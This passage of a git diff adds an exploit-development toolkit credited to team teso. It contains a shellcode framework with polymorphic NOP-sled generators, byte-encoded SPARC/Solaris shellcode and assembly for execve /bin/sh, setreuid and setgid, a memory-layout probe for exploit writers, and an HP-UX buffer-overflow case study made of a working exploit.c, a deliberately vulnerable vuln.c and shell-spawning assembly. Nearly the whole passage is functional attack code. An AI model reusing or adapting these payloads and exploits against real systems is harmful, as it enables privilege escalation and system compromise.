23 unsigned char *, int);
24
25/* helper macro to set individual bits
26 */
27#define BSET(dest, len, val, bw) { \
28 dest &= ~(((unsigned char) ~0) >> bw); /* clear lower bits */ \
29 dest |= val << (8 - bw - len); /* set value bits */ \
30 bw += len; \
31}
32
33
34typedef struct {
35 char * code_string; /* description string of the code */
36 unsigned int code_len; /* length of code in bytes */
37 unsigned char * code; /* code byte array */
38} shellcode;
39
40
41typedef struct {
42 char * arch_string; /* description string of this arch */
43 unsigned int arch_codelen; /* minimum instruction length */
44 nop_gen arch_nop; /* nop space generation function */
45 shellcode ** arch_codes; /* shellcode array for this arch */
46} arch;
47
48
49unsigned long int
50random_get (unsigned long int low, unsigned long int high);
51
52void
53random_init (void);
54
55int
56bad (unsigned char u);
57
58int
59badstr (unsigned char *code, int code_len, unsigned char *bad, int bad_len);
60
61#endif
62
diff --git a/other/shellkit/shellcode.o b/other/shellkit/shellcode.o
new file mode 100644
index 0000000..189bd9e
--- /dev/null
+++ b/other/shellkit/shellcode.o
Binary files differ
diff --git a/other/shellkit/shellkit b/other/shellkit/shellkit
new file mode 100644
index 0000000..1dab7f3
--- /dev/null
+++ b/other/shellkit/shellkit
Binary files differ
diff --git a/other/shellkit/shellkit.c b/other/shellkit/shellkit.c
new file mode 100644
index 0000000..79d830d
--- /dev/null
+++ b/other/shellkit/shellkit.c
@@ -0,0 +1,123 @@
1/* shellkit.c - experimentation program for included shellcodes
2 *
3 * team teso
4 */
5
6#include <stdio.h>
7#include <stdlib.h>
8#include <unistd.h>
9#include "shellkit.h"
10
11
12void usage (void);
13void sc_list (void);
14
15int dump = 0;
16int execute = 0;
17
18
19void
20usage (void)
21{
22 printf ("usage: shellkit [-hdlx] [-e env1 [-e env2] ...] [code-identifier1 [ci2 [...]]]\n\n");
23 printf ("options:\n");
24 printf ("\t-h\thelp, you're just viewing it\n"
25 "\t-d\tdump shellcode in hex\n"
26 "\t-l\tonly list available shellcodes\n"
27 "\t-x\texecute choosen shellcode\n"
28 "\t-e env\tbuild an environment for the shellcode, use -e list\n"
29 "\t\tto get a list\n\n");
30 printf ("the shellkit utility will build a chained block of codes described by the\n"
31 "given code identifiers, copy it to a writeable place of memory and will\n"
32 "do anything necessary to execute this block of code on your architecture.\n"
33 "before executing the code the environments specified are installed.\n"
34 "you can - of course - only execute code for your architecture.\n\n");
35
36 exit (EXIT_FAILURE);
37}
38
39
40void
41env_list (void)
42{
43 printf ("list of available environments:\n\n");
44
45 exit (EXIT_SUCCESS);
46}
47
48
49void
50sc_list (void)
51{
52 int sc_walker;
53 int arch_walker;
54 arch * a;
55
56
57 for (arch_walker = 0 ; shellcodes[arch_walker] != NULL ;
58 ++arch_walker)
59 {
60 a = shellcodes[arch_walker];
61
62 printf ("%s:\n", a->arch_string);
63 for (sc_walker = 0 ; a->arch_codes[sc_walker] != NULL ;
64 ++sc_walker)
65 {
66 printf ("\t%-30s %3d\n",
67 a->arch_codes[sc_walker]->code_string,
68 a->arch_codes[sc_walker]->code_len);
69 }
70 printf ("\n");
71 }
72
73 exit (EXIT_SUCCESS);
74}
75
76
77int
78main (int argc, char *argv[])
79{
80 int c;
81 int xenvc = 0;
82 char * xenv[16];
83
84
85 random_init ();
86 memset (xenv, '\x00', sizeof (xenv));
87
88 if (argc < 2)
89 sc_list ();
90
91 while ((c = getopt (argc, argv, "hdlxe:")) != -1) {
92 switch (c) {
93 case 'h':
94 usage ();
95 break;
96 case 'd':
97 dump = 1;
98 break;
99 case 'l':
100 sc_list ();
101 break;
102 case 'x':
103 execute = 1;
104 break;
105 case 'e':
106 if (strcmp (optarg, "list") == 0)
107 env_list ();
108 if (xenvc >= 15) {
109 fprintf (stderr, "insane, huh? dont mess\n");
110 exit (EXIT_FAILURE);
111 }
112 xenv[xenvc++] = optarg;
113 break;
114 default:
115 usage ();
116 break;
117 }
118 }
119
120 exit (EXIT_SUCCESS);
121}
122
123
diff --git a/other/shellkit/shellkit.h b/other/shellkit/shellkit.h
new file mode 100644
index 0000000..074fd65
--- /dev/null
+++ b/other/shellkit/shellkit.h
@@ -0,0 +1,31 @@
1/* shellkit.h - main shellcode kit definition file
2 *
3 * everything is merged here.
4 *
5 * team teso
6 */
7
8#ifndef SHELLKIT_H
9#define SHELLKIT_H
10
11#include "shellcode.h"
12
13/* individual architectures */
14#include "hppa_hpux.h"
15#include "mips_irix.h"
16#include "sparc_solaris.h"
17#include "x86_bsd.h"
18#include "x86_linux.h"
19
20arch * shellcodes[] = {
21 &hppa_hpux,
22 &mips_irix,
23 &sparc_solaris,
24 &x86_bsd,
25 &x86_linux,
26 NULL,
27};
28
29
30#endif
31
diff --git a/other/shellkit/sparc.c b/other/shellkit/sparc.c
new file mode 100644
index 0000000..45fe647
--- /dev/null
+++ b/other/shellkit/sparc.c
@@ -0,0 +1,140 @@
1/* sparc.c - generic sparc functions
2 *
3 * by team teso
4 */
5
6#include <stdio.h>
7#include <stdlib.h>
8#include "shellcode.h"
9#include "sparc.h"
10
11
12static int sparc_torf (void);
13static unsigned long int sparc_getinstr (unsigned char *pat,
14 unsigned char *bad, int bad_len);
15
16
17static int
18sparc_torf (void)
19{
20 return (random_get (0, 1));
21}
22
23
24static unsigned long int
25sparc_getinstr (unsigned char *pat, unsigned char *bad, int bad_len)
26{
27 int x; /* bitfield walker */
28 unsigned char bc = 0;
29 unsigned long int i = 0; /* generated instruction */
30
31
32 for (x = 31 ; x > 0 ; --x) {
33
34 switch (pat[x]) {
35 case '.':
36 if (badstr (&bc, 1, bad, bad_len)) {
37 /*x -= 8;*/
38 printf ("redo byte! #muh\n");
39 }
40 bc = 0;
41 break;
42
43 case '0':
44 break;
45
46 case '1':
47 i |= (1 << x);
48 bc |= (1 << (x % 8));
49 break;
50
51 case 'v':
52 if (badstr (&bc, 1, bad, bad_len)) {
53 i |= (1 << x);
54 bc |= (1 << (x % 8));
55 } else if (sparc_torf ()) {
56 i |= (1 << x);
57 bc |= (1 << (x % 8));
58 }
59 break;
60
61 case 'r':
62 case 'f':
63 case 's':
64 if (badstr (&bc, 1, bad, bad_len)) {
65 i |= (1 << x);
66 bc |= (1 << (x % 8));
67 } else if (sparc_torf ()) {
68 i |= (1 << x);
69 bc |= (1 << (x % 8));
70 }
71 break;
72 default:
73 fprintf (stderr, "sorry, can not generate nop's for "
74 "trinary sparcs ...\n");
75
76 exit (EXIT_FAILURE);
77 break;
78 }
79 }
80
81 return (i);
82}
83
84
85/* XXX: DO NOT USE UNTESTED! */
86unsigned int
87sparc_nop (unsigned char *dest, unsigned int dest_len,
88 unsigned char *bad, int bad_len)
89{
90 unsigned long int * dest_p = NULL;
91 unsigned int count = 0;
92
93 /* abstract representation of a sparc instruction.
94 * '1', '0': real bits of the instruction
95 * 'r', 'f', 's': destination, first and second source register
96 * 'v': either a 1 or 0 bit (any value)
97 *
98 * for details see "The SPARC Architecture Manual", chapter 5
99 * ("Instructions") and appendix F + B.
100 */
101 unsigned char * pat = NULL;
102 unsigned char * instr_format[] = {
103 "10rrrrr0.00011fff.ff000000.000sssss",
104 "10rrrrr0.00011fff.ff1vvvvv.vvvvvvvv", /* xor */
105
106 "10rrrrr0.00111fff.ff000000.000sssss",
107 "10rrrrr0.00111fff.ff1vvvvv.vvvvvvvv", /* xnor */
108
109 "10rrrrr0.00100fff.ff000000.000sssss",
110 "10rrrrr0.00100fff.ff1vvvvv.vvvvvvvv", /* sub */
111
112 "10rrrrr0.00010fff.ff000000.000sssss",
113 "10rrrrr0.00010fff.ff1vvvvv.vvvvvvvv", /* or */
114
115 "10rrrrr0.00000fff.ff000000.000sssss",
116 "10rrrrr0.00000fff.ff1vvvvv.vvvvvvvv", /* add */
117
118 "10rrrrr0.00001fff.ff000000.000sssss",
119 "10rrrrr0.00001fff.ff1vvvvv.vvvvvvvv", /* and */
120
121 /* XXX/TODO: add more codes */
122
123 NULL,
124 };
125
126
127 /* take care of instruction size
128 */
129 dest_len = dest_len - (dest_len % 4);
130 dest_p = (unsigned long int *) dest;
131
132 for ( ; count < dest_len ; count += 4) {
133 pat = instr_format[rand () % 12];
134 *dest_p++ = sparc_getinstr (pat, bad, bad_len);
135 }
136
137 return (count);
138}
139
140
diff --git a/other/shellkit/sparc.h b/other/shellkit/sparc.h
new file mode 100644
index 0000000..bf5bd93
--- /dev/null
+++ b/other/shellkit/sparc.h
@@ -0,0 +1,10 @@
1
2#ifndef SPARC_H
3#define SPARC_H
4
5unsigned int
6sparc_nop (unsigned char *dest, unsigned int dest_len,
7 unsigned char *bad, int bad_len);
8
9#endif
10
diff --git a/other/shellkit/sparc.o b/other/shellkit/sparc.o
new file mode 100644
index 0000000..22f52c8
--- /dev/null
+++ b/other/shellkit/sparc.o
Binary files differ
diff --git a/other/shellkit/sparc_solaris.c b/other/shellkit/sparc_solaris.c
new file mode 100644
index 0000000..ce44a1a
--- /dev/null
+++ b/other/shellkit/sparc_solaris.c
@@ -0,0 +1,58 @@
1#include <stdio.h>
2#include <stdlib.h>
3#include <string.h>
4#include "shellcode.h"
5#include "sparc.h"
6
7
8shellcode sparc_solaris_execvesh = {
9 "sparc-solaris-execve",
10 48,
11 "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda"
12 "\x90\x03\xa0\x08\x92\x13\x80\x0e\x9c\x03\xa0\x10"
13 "\x94\x1b\x80\x0e\xec\x3b\xbf\xf8\xd0\x23\xbf\xf0"
14 "\xd4\x23\xbf\xf4\x82\x10\x20\x3b\x91\xd0\x20\x08",
15};
16
17
18shellcode sparc_solaris_exit = {
19 "sparc-solaris-exit",
20 8,
21 "\x82\x10\x20\x01\x91\xd0\x20\x08",
22};
23
24
25shellcode sparc_solaris_setgid = {
26 "sparc-solaris-setgid",
27 16,
28 "\x90\x10\x21\x42\x90\x1a\x21\x44\x82\x10\x20\x2e"
29 "\x91\xd0\x20\x08",
30};
31
32
33shellcode sparc_solaris_setreuid = {
34 "sparc-solaris-setreuid",
35 24,
36 "\x90\x10\x21\x42\x90\x1a\x21\x44\x92\x10\x21\x46"
37 "\x92\x1a\x61\x48\x82\x10\x20\x2e\x91\xd0\x20\x08",
38};
39
40
41shellcode * sparc_solaris_shellcodes[] = {
42 &sparc_solaris_execvesh,
43 &sparc_solaris_exit,
44 &sparc_solaris_setgid,
45 &sparc_solaris_setreuid,
46 NULL,
47};
48
49
50arch sparc_solaris = {
51 "sparc-solaris",
52 4,
53 sparc_nop,
54 sparc_solaris_shellcodes
55};
56
57
58
diff --git a/other/shellkit/sparc_solaris.h b/other/shellkit/sparc_solaris.h
new file mode 100644
index 0000000..24419e3
--- /dev/null
+++ b/other/shellkit/sparc_solaris.h
@@ -0,0 +1,6 @@
1#ifndef SPARC_SOLARIS_H
2#define SPARC_SOLARIS_H
3
4arch sparc_solaris;
5
6#endif
diff --git a/other/shellkit/sparc_solaris.o b/other/shellkit/sparc_solaris.o
new file mode 100644
index 0000000..0b98d72
--- /dev/null
+++ b/other/shellkit/sparc_solaris.o
Binary files differ
diff --git a/other/shellkit/sparc_solaris/AUTHORS b/other/shellkit/sparc_solaris/AUTHORS
new file mode 100644
index 0000000..01bb209
--- /dev/null
+++ b/other/shellkit/sparc_solaris/AUTHORS
@@ -0,0 +1,2 @@
1palmers / teso
2smiler / teso
diff --git a/other/shellkit/sparc_solaris/NOTES b/other/shellkit/sparc_solaris/NOTES
new file mode 100644
index 0000000..166eccc
--- /dev/null
+++ b/other/shellkit/sparc_solaris/NOTES
@@ -0,0 +1,11 @@
1would this shellcodes work in sparc NetBSD or SunOS?
2would require "ta 0" instead of "ta8"?
3
4
5todo:
6connect
7bind
8chmod
9read
10spset
11
diff --git a/other/shellkit/sparc_solaris/execve.s b/other/shellkit/sparc_solaris/execve.s
new file mode 100644
index 0000000..0a0c11b
--- /dev/null
+++ b/other/shellkit/sparc_solaris/execve.s
@@ -0,0 +1,20 @@
1 .globl cbegin
2 .globl cend
3
4cbegin:
5
6 sethi 0xbd89a, %l6
7 or %l6, 0x16e, %l6
8 sethi 0xbdcda, %l7
9 add %sp, 8, %o0
10 or %sp, %sp, %o1
11 add %sp, 16, %sp
12 xor %o6, %o6, %o2
13 std %l6, [%sp - 8]
14 st %o0, [%sp - 16]
15 st %o2, [%sp - 12]
16 mov 0x3b, %g1
17 ta 8
18
19cend:
20
diff --git a/other/shellkit/sparc_solaris/exit.s b/other/shellkit/sparc_solaris/exit.s
new file mode 100644
index 0000000..3019a42
--- /dev/null
+++ b/other/shellkit/sparc_solaris/exit.s
@@ -0,0 +1,10 @@
1 .globl cbegin
2 .globl cend
3
4cbegin:
5
6 mov 0x1, %g1
7 ta 0x8
8
9cend:
10
diff --git a/other/shellkit/sparc_solaris/setgid.s b/other/shellkit/sparc_solaris/setgid.s
new file mode 100644
index 0000000..c307065
--- /dev/null
+++ b/other/shellkit/sparc_solaris/setgid.s
@@ -0,0 +1,12 @@
1 .globl cbegin
2 .globl cend
3
4cbegin:
5
6 mov 0x4142, %o0
7 xor 0x4344, %o0, %o0
8 mov 0x2e, %g1
9 ta 0x8
10
11cend:
12
diff --git a/other/shellkit/sparc_solaris/setreuid.s b/other/shellkit/sparc_solaris/setreuid.s
new file mode 100644
index 0000000..e17c375
--- /dev/null
+++ b/other/shellkit/sparc_solaris/setreuid.s
@@ -0,0 +1,14 @@
1 .globl cbegin
2 .globl cend
3
4cbegin:
5
6 mov 0x4142, %o0
7 xor 0x4344, %o0, %o0
8 mov 0x4546, %o1
9 xor 0x4748, %o1, %o1
10 mov 0xca, %g1
11 ta 0x8
12
13cend:
14
diff --git a/other/shellkit/splocoder b/other/shellkit/splocoder
new file mode 100644
index 0000000..6828783
--- /dev/null
+++ b/other/shellkit/splocoder
Binary files differ
diff --git a/other/shellkit/splocoder.c b/other/shellkit/splocoder.c
new file mode 100644
index 0000000..96e36f8
--- /dev/null
+++ b/other/shellkit/splocoder.c
@@ -0,0 +1,184 @@
1/*
2
3 A tool for the young exploit coder, Copyright (c) acpizer, 2001.
4
5*/
6
7#include <stdio.h>
8#include <stdlib.h>
9#include <sys/utsname.h>
10
11
12char small_global[] = "acpizer";
13
14int uninitialized_global;
15
16
17int endianess() {
18 union {
19 long l;
20 char c[sizeof (long)];
21 } u;
22
23 u.l = 1;
24
25 return (u.c[sizeof (long) - 1] == 1);
26}
27
28
29static int iterate = 10;
30
31int stack_growsdown(int *x) {
32 auto int y;
33
34
35 y = (x > &y);
36
37 if (--iterate > 0)
38 y = stack_growsdown(&y);
39
40 if (y != (x > &y))
41 exit(1);
42
43 return y;
44}
45
46typedef struct {
47 char * sys_name;
48 char * sys_release;
49 char * sys_version;
50 char * sys_machine;
51
52 unsigned long int malloc_zero;
53 unsigned long int malloc_neg;
54 unsigned long int malloc_big;
55
56 unsigned long int malloc_small;
57 unsigned long int malloc_tiny;
58
59 unsigned long int bss;
60 unsigned long int data;
61
62 int sizeof_int;
63 int sizeof_voidptr;
64
65 unsigned long int env_start;
66
67 unsigned long int frame_addr;
68
69 int stack_down;
70 int endian_big;
71} sys_def;
72
73sys_def this;
74
75
76int
77main (int argc, char *argv[], char *env[])
78{
79 struct utsname uts;
80
81 char localstack[5];
82 auto int x;
83
84
85 printf("splocoder, v1.0 by acpizer & sc -- team teso.\n\n");
86
87 uname (&uts);
88
89 this.sys_name = uts.sysname;
90 this.sys_release = uts.release;
91 this.sys_version = uts.version;
92 this.sys_machine = uts.machine;
93
94#ifdef VERBOSE
95 printf("System: %s %s %s %s\n\n", uts.sysname, uts.release, uts.version,
96 uts.machine);
97#endif
98
99 this.malloc_zero = (unsigned long int) malloc (0);
100 this.malloc_neg = (unsigned long int) malloc (-4);
101 this.malloc_big = (unsigned long int) malloc (1024 * 1024);
102
103#ifdef VERBOSE
104 printf("malloc(0) returns: 0x%08lx\n", this.malloc_zero);
105 printf("malloc(-4) returns: 0x%08lx\n", this.malloc_neg);
106 printf("Big heap: 0x%08lx\n", this.malloc_big);
107#endif
108
109 /* There might be a differece, depending on malloc implementation. */
110 this.malloc_small = (unsigned long int) malloc (100);
111 this.malloc_tiny = (unsigned long int) malloc (5);
112
113#ifdef VERBOSE
114 printf("Small heap: 0x%08lx\n", this.malloc_small);
115 printf("Tiny heap: 0x%08lx\n\n", this.malloc_tiny);
116#endif
117
118
119 this.bss = (unsigned long int) &uninitialized_global;
120 this.data = (unsigned long int) &small_global;
121
122#ifdef VERBOSE
123 printf("bss is at: 0x%08lx\n", this.bss);
124 printf("Initialized global data is at: 0x%08lx\n\n", this.data);
125#endif
126
127
128 this.sizeof_int = sizeof (int);
129 this.sizeof_voidptr = sizeof (void *);
130
131#ifdef VERBOSE
132 printf("sizeof(int): %d\n", this.sizeof_int);
133 printf("sizeof(void *): %d\n\n", this.sizeof_voidptr);
134#endif
135
136
137 this.env_start = (unsigned long int) &env[0];
138#ifdef VERBOSE
139 printf("environ[0]: 0x%08lx\n\n", this.env_start);
140#endif
141
142 this.frame_addr = (unsigned long int) &localstack;
143#ifdef VERBOSE
144 printf("Local stack variable is at 0x%08lx\n", this.frame_addr);
145#endif
146
147 this.stack_down = stack_growsdown (&x) ? 1 : 0;
148#ifdef VERBOSE
149 printf("Stack growth direction: %s\n", this.stack_down ? "down" : "up");
150#endif
151
152 this.endian_big = endianess () ? 1 : 0;
153#ifdef VERBOSE
154 printf("Endianess: %s\n\n", this.endian_big ? "big" : "little");
155#endif
156
157
158 {
159 char sys[30];
160
161 snprintf (sys, sizeof (sys), "%s-%s-%s", this.sys_name,
162 this.sys_release, this.sys_machine);
163 fprintf (stderr, "%-32s ", sys);
164 }
165 fprintf (stderr, "%s %-10s ", this.endian_big ? "be" : "le",
166 this.stack_down ? "stackdown" : "stackup");
167 fprintf (stderr, "%3d %3d\n",
168 this.sizeof_int, this.sizeof_voidptr);
169
170 fprintf (stderr, "%-33s%08lx %08lx %08lx %08lx",
171 " data bss stack env",
172 this.data, this.bss,
173 this.frame_addr, this.env_start);
174 fprintf (stderr, "\n");
175
176 fprintf (stderr, "%-33s%08lx %08lx %08lx %08lx %08lx ",
177 " M: zero neg big small tiny",
178 this.malloc_zero, this.malloc_neg, this.malloc_big,
179 this.malloc_small, this.malloc_tiny);
180 fprintf (stderr, "\n");
181
182 exit (EXIT_SUCCESS);
183}
184
diff --git a/other/shellkit/tmp/hpux-tools.tar.gz b/other/shellkit/tmp/hpux-tools.tar.gz
new file mode 100644
index 0000000..6fa3a5e
--- /dev/null
+++ b/other/shellkit/tmp/hpux-tools.tar.gz
Binary files differ
diff --git a/other/shellkit/tmp/hpux-tools/Makefile b/other/shellkit/tmp/hpux-tools/Makefile
new file mode 100644
index 0000000..19e8fd4
--- /dev/null
+++ b/other/shellkit/tmp/hpux-tools/Makefile
@@ -0,0 +1,5 @@
1all: sample-one shell-one shell-two shell-tree
2
3
4sample-one:
5 @cd sample-one && make
diff --git a/other/shellkit/tmp/hpux-tools/README b/other/shellkit/tmp/hpux-tools/README
new file mode 100644
index 0000000..b6ee0df
--- /dev/null
+++ b/other/shellkit/tmp/hpux-tools/README
@@ -0,0 +1,10 @@
1This archive contains following files:
2Makefile - make file to build the stuff
3sample-one - example of exploit and vulnerable program
4shell-one.s - shellcode (v1)
5shell-tree.s - shellcode (v2)
6shell-two.s - shellcode (v3)
7
8
9--
10fygrave@tigerteam.net
diff --git a/other/shellkit/tmp/hpux-tools/sample-one/Makefile b/other/shellkit/tmp/hpux-tools/sample-one/Makefile
new file mode 100644
index 0000000..aea8390
--- /dev/null
+++ b/other/shellkit/tmp/hpux-tools/sample-one/Makefile
@@ -0,0 +1,10 @@
1all: exploit vuln
2
3exploit: exploit.c
4 gcc exploit.c -o exploit
5vuln: vuln.c
6 gcc vuln.c -o vuln
7
8
9clean:
10 @rm -f core *.core *.o vuln exploit a.out
diff --git a/other/shellkit/tmp/hpux-tools/sample-one/README b/other/shellkit/tmp/hpux-tools/sample-one/README
new file mode 100644
index 0000000..66be971
--- /dev/null
+++ b/other/shellkit/tmp/hpux-tools/sample-one/README
@@ -0,0 +1,5 @@
1These are examples for HP-UX buffer overflow case study. For more information
2please see http://www.notlsd.net/bof/
3
4--
5fygrave@tigerteam.net Tue Mar 20 15:41:48 ICT 2001
diff --git a/other/shellkit/tmp/hpux-tools/sample-one/exploit.c b/other/shellkit/tmp/hpux-tools/sample-one/exploit.c
new file mode 100644
index 0000000..11dc23c
--- /dev/null
+++ b/other/shellkit/tmp/hpux-tools/sample-one/exploit.c
@@ -0,0 +1,123 @@
1/*
2 * Sample exploit for HP-UX buffer overflows case study
3 */
4#include <stdio.h>
5#include <unistd.h>
6
7
8char shellcode[]=
9"\xe8\x3f\x1f\xfd\xb4\x23\x03\xe8\x60\x60\x3c\x61\x0b\x39\x02"
10"\x99\x34\x1a\x3c\x53\x0b\x43\x06\x1a\x20\x20\x08\x01\x34\x16\x03"
11"\xe8\xe4\x20\xe0\x08\x96\xd6\x03\xfe/bin/shA";
12
13#define BUFFER_SIZE 180
14#define STACK_DSO -84
15#define NOP 0x0b390280
16#define PAD 0
17#define ALIGN 8
18#define ADB_PATH "/usr/bin/adb"
19#define VULNVAR "VULNBUF="
20#define MORE 1
21
22
23unsigned long get_sp(void)
24{
25 __asm__("copy %sp,%ret0 \n");
26}
27
28int main(int argc, char **argv) {
29int i, dso, align, padd, buf_size, adb, more;
30char *buf, *ptr;
31unsigned long retaddr;
32
33
34dso = STACK_DSO;
35align = ALIGN;
36padd = PAD;
37buf_size = BUFFER_SIZE;
38retaddr = 0;
39more = MORE;
40
41
42
43
44while ((i = getopt(argc, argv,
45 "Dd:b:r:o:a:p:m:")) != EOF) {
46 switch (i) {
47 case 'd':
48 dso=(int) strtol(optarg, NULL, 0);
49 break;
50 case 'm':
51 more+=(int) strtol(optarg, NULL, 0);
52 break;
53 case 'b':
54 buf_size=(int)strtol(optarg, NULL, 0);
55 break;
56 case 'r':
57 retaddr = strtoul(optarg, NULL, 0);
58 break;
59 case 'a':
60 align = (int) strtol(optarg, NULL, 0);
61 break;
62 case 'p':
63 padd = (int) strtol(optarg, NULL, 0);
64 break;
65 case 'D':
66 adb = 1;
67 break;
68 default:
69 fprintf(stderr, "usage: %s [-b buffer_size] [-d dso] "
70 "[-r return_address]"
71 "[-a align] [-p pad] [-D] [-m more_rets]\n", argv[0]);
72 exit(1);
73 break;
74 }
75}
76
77
78buf=(char *)calloc(strlen(VULNVAR) + buf_size
79 + sizeof(unsigned long)*more + 1, 1);
80ptr=buf;
81if (!buf) {
82 perror("calloc");
83 exit(1);
84}
85
86fprintf(stderr,"our stack %X\n",get_sp());
87if (!retaddr)
88 retaddr=get_sp()- dso + 3;
89fprintf(stderr, "Using: ret: 0x%X pad: %i align: %i"
90 " buf_len: %i dso: %i more: %i\n",
91 retaddr, padd, align, buf_size, dso, more);
92
93strcpy(buf, VULNVAR);
94ptr+=strlen(VULNVAR);
95for(i=0;i<align; i++) *ptr++='A'; // fill in alignment
96
97for(i=0;i<(buf_size-strlen(shellcode)-align-padd)/4;i++) { // fill in some nops
98 *ptr++=(NOP>>24)&0xff;
99 *ptr++=(NOP>>16)&0xff;
100 *ptr++=(NOP>>8)&0xff;
101 *ptr++=(NOP)&0xff;
102}
103
104strcat(buf, shellcode); // append shellcode
105ptr+=strlen(shellcode);
106
107for(i=0;i<padd; i++) *ptr++='B'; // padd
108
109for (i=0;i<more ; i++) {
110 *ptr++=(retaddr>>24)&0xff;
111 *ptr++=(retaddr>>16)&0xff;
112 *ptr++=(retaddr>>8)&0xff;
113 *ptr++=(retaddr)&0xff;
114}
115fprintf(stderr,"buflen is %i\n", strlen(buf));
116putenv(buf,1);
117if (adb)
118 execl(ADB_PATH,"adb","vuln", NULL);
119else
120 execl("./vuln","vuln",buf, NULL);
121perror("execl");
122return 0; // uff
123}
diff --git a/other/shellkit/tmp/hpux-tools/sample-one/vuln.c b/other/shellkit/tmp/hpux-tools/sample-one/vuln.c
new file mode 100644
index 0000000..698af76
--- /dev/null
+++ b/other/shellkit/tmp/hpux-tools/sample-one/vuln.c
@@ -0,0 +1,34 @@
1/*
2 * Sample vulnerable program for HP-UX buffer overflows case study
3 */
4#include <stdio.h>
5#include <stdlib.h>
6
7
8unsigned long get_sp(void)
9{
10 __asm__("copy %sp,%ret0 \n");
11}
12
13void baz(char *argument) {
14 char badbuf[200];
15
16 printf("badbuf ptr is: %p\n",badbuf);
17 strcpy(badbuf,argument);
18}
19
20void foo(char *arg) {
21
22 baz(arg);
23
24}
25
26int main(int argc, char **argv) {
27char *param;
28
29printf("vuln stack is: 0x%X\n",get_sp());
30param=getenv("VULNBUF");
31foo(param);
32
33return 0;
34}
diff --git a/other/shellkit/tmp/hpux-tools/shell-one.s b/other/shellkit/tmp/hpux-tools/shell-one.s
new file mode 100644
index 0000000..afbf9f8
--- /dev/null
+++ b/other/shellkit/tmp/hpux-tools/shell-one.s
@@ -0,0 +1,39 @@
1 .SPACE $TEXT$
2 .SUBSPA $CODE$,QUAD=0,ALIGN=8,ACCESS=44
3
4 .align 4
5 .EXPORT main,ENTRY,PRIV_LEV=3,ARGW0=GR,ARGW1=GR
6main
7
8 bl shellcode, %r1
9 nop
10 .SUBSPA $DATA$
11 .EXPORT shellcode; So we could see it in debugger
12shellcode
13 xor %r26, %r26, %r26; 0 - argv0
14 ldil L%0xc0000000,%r1; entry point
15 ble 0x4(%sr7,%r1) ;
16 ldi 23, %r22
17
18jump
19 bl .+8,%r1 ; address into %r1
20 nop
21 stb %r0, SHELL-jump+7-11(%sr0,%r1)
22
23 xor %r25, %r25, %r25; NULL ->arg1
24 ldi SHELL-jump-11, %r26;
25 add %r1, %r26, %r26;
26
27 ldil L%0xc0000000,%r1; entry point
28 ble 0x4(%sr7,%r1) ;
29 ldi 11, %r22;
30
31 xor %r26, %r26, %r26; return 0
32 ldil L%0xc0000000,%r1; entry point
33 ble 0x4(%sr7,%r1) ;
34 ldi 1, %r22 ; exit
35
36SHELL
37 .STRING "/bin/shA";
38
39endofshellcode
diff --git a/other/shellkit/tmp/hpux-tools/shell-tree.s b/other/shellkit/tmp/hpux-tools/shell-tree.s
new file mode 100644
index 0000000..c3044da
--- /dev/null
+++ b/other/shellkit/tmp/hpux-tools/shell-tree.s
@@ -0,0 +1,31 @@
1 .SPACE $TEXT$
2 .SUBSPA $CODE$,QUAD=0,ALIGN=8,ACCESS=44
3
4 .align 4
5 .EXPORT main,ENTRY,PRIV_LEV=3,ARGW0=GR,ARGW1=GR
6main
7
8 bl shellcode, %r1
9 nop
10 .SUBSPA $DATA$
11 .EXPORT shellcode; So we could see it in debugger
12shellcode
13
14 bl .+4,%r1 ; address into %r1
15 addi 500, %r1, %r3;
16 stb %r0, SHELL-shellcode+7-11-500(%sr0,%r3)
17
18 xor %r25, %r25, %r25; NULL ->arg1
19 ldi SHELL-shellcode-11-500, %r26;
20 add %r3, %r26, %r26;
21
22 ldil L%0xc0000000,%r1; entry point
23 ldi 500, %r22 ;
24 ble 0x4(%sr7,%r1) ;
25 subi 511, %r22, %r22 ;
26
27
28SHELL
29 .STRING "/bin/shA";
30
31endofshellcode
diff --git a/other/shellkit/tmp/hpux-tools/shell-two.s b/other/shellkit/tmp/hpux-tools/shell-two.s
new file mode 100644
index 0000000..5dac10f
--- /dev/null
+++ b/other/shellkit/tmp/hpux-tools/shell-two.s
@@ -0,0 +1,41 @@
1 .SPACE $TEXT$
2 .SUBSPA $CODE$,QUAD=0,ALIGN=8,ACCESS=44
3
4 .align 4
5 .EXPORT main,ENTRY,PRIV_LEV=3,ARGW0=GR,ARGW1=GR
6main
7
8 bl shellcode, %r1
9 nop
10 .SUBSPA $DATA$
11 .EXPORT shellcode; So we could see it in debugger
12shellcode
13 xor %r26, %r26, %r26; 0 - argv0
14 ldil L%0xc0000000,%r1; entry point
15 ldi 500, %r22 ;
16 ble 0x4(%sr7,%r1) ;
17 subi 523, %r22, %r22 ; setuid(0)
18jump
19 bl .+4,%r1 ; address into %r1
20 addi 500, %r1, %r3;
21 stb %r0, SHELL-jump+7-11-500(%sr0,%r3)
22
23 xor %r25, %r25, %r25; NULL ->arg1
24 ldi SHELL-jump-11-500, %r26;
25 add %r3, %r26, %r26;
26
27 ldil L%0xc0000000,%r1; entry point
28 ldi 500, %r22 ;
29 ble 0x4(%sr7,%r1) ;
30 subi 511, %r22, %r22 ;
31
32 xor %r26, %r26, %r26; return 0
33 ldil L%0xc0000000,%r1; entry point
34 ldi 500, %r22 ;
35 ble 0x4(%sr7,%r1) ;
36 subi 501, %r22, %r22 ; exit
37
38SHELL
39 .STRING "/bin/shA";
40
41endofshellcode
diff --git a/other/shellkit/tmp/hpux_bof.pdf b/other/shellkit/tmp/hpux_bof.pdf
new file mode 100644
index 0000000..6d2a957
--- /dev/null
+++ b/other/shellkit/tmp/hpux_bof.pdf
Binary files differ
diff --git a/other/shellkit/x86.c b/other/shellkit/x86.c
new file mode 100644
index 0000000..dd580c6
--- /dev/null
+++ b/other/shellkit/x86.c
@@ -0,0 +1,124 @@
1/* x86.c - generic x86 functions
2 *
3 * by team teso
4 */
5
6#include <stdio.h>
7#include <stdlib.h>
8#include "shellcode.h"
9#include "x86.h"
10
11
12static unsigned long int x86_nop_rwreg (void);
13static unsigned long int x86_nop_xfer (char *xferstr);
14
15
16static unsigned long int
17x86_nop_rwreg (void)
18{
19 unsigned long int reg;
20
21 do {
22 reg = random_get (0, 7);
23 } while (reg == 4); /* 4 = $esp */
24
25 return (reg);
26}
27
28
29static unsigned long int
30x86_nop_xfer (char *xferstr)
31{
32 int bw = 0; /* bitfield walker */
33 unsigned char tgt; /* resulting instruction */
34
35 /* in a valid xferstr we trust */
36 for (tgt = 0 ; xferstr != NULL && xferstr[0] != '\0' ; ++xferstr) {
